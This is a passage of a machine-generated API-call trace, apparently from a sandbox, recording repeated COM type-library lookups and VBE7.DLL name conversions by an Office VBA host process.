lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.532] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.533] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.533] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.533] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.533] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.533] IUnknown:Release (This=0x665ba50) returned 0xd [0069.533] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.533] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.533] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.533] IMalloc:Realloc (This=0x7fefec05380, pv=0xaffde90, cb=0x2010) returned 0xaffde90 [0069.533] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.533] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.533] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.533] IUnknown:Release (This=0x665ba50) returned 0xd [0069.533] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.533] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.533] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.533] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.533] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.533] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.534] IUnknown:Release (This=0x665ba50) returned 0xd [0069.534] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.534] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.534] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.534] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.534] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.534] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.534] IUnknown:Release (This=0x665ba50) returned 0xd [0069.534] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.534] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.534] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.534] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.534] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.534] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.534] IUnknown:Release (This=0x665ba50) returned 0xd [0069.534] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.534] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.534] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.534] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.535] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.535] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.535] IUnknown:Release (This=0x665ba50) returned 0xd [0069.535] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.535] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.535] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.535] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.535] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.535] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.535] IUnknown:Release (This=0x665ba50) returned 0xd [0069.535] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.535] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.535] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.535] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.535] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.535] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.536] IUnknown:Release (This=0x665ba50) returned 0xd [0069.536] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.536] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.536] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.536] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.536] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.536] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.536] IUnknown:Release (This=0x665ba50) returned 0xd [0069.536] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.536] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.536] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.536] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.536] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.537] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.537] IUnknown:Release (This=0x665ba50) returned 0xd [0069.537] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.537] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.537] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.537] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.537] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.537] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.537] IUnknown:Release (This=0x665ba50) returned 0xd [0069.537] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.537] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.537] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.537] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.537] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.537] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.537] IUnknown:Release (This=0x665ba50) returned 0xd [0069.537] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.537] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.537] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.537] IMalloc:Realloc (This=0x7fefec05380, pv=0xaffde90, cb=0x2410) returned 0xafbaf80 [0069.538] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.538] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.538] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.538] IUnknown:Release (This=0x665ba50) returned 0xd [0069.538] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.538] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.538] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.538] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.538] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.538] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.538] IUnknown:Release (This=0x665ba50) returned 0xd [0069.538] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.538] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.538] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.538] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.538] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.538] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.538] IUnknown:Release (This=0x665ba50) returned 0xd [0069.538] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.538] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.539] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.539] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.539] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.539] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.539] IUnknown:Release (This=0x665ba50) returned 0xd [0069.539] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.539] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.539] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, 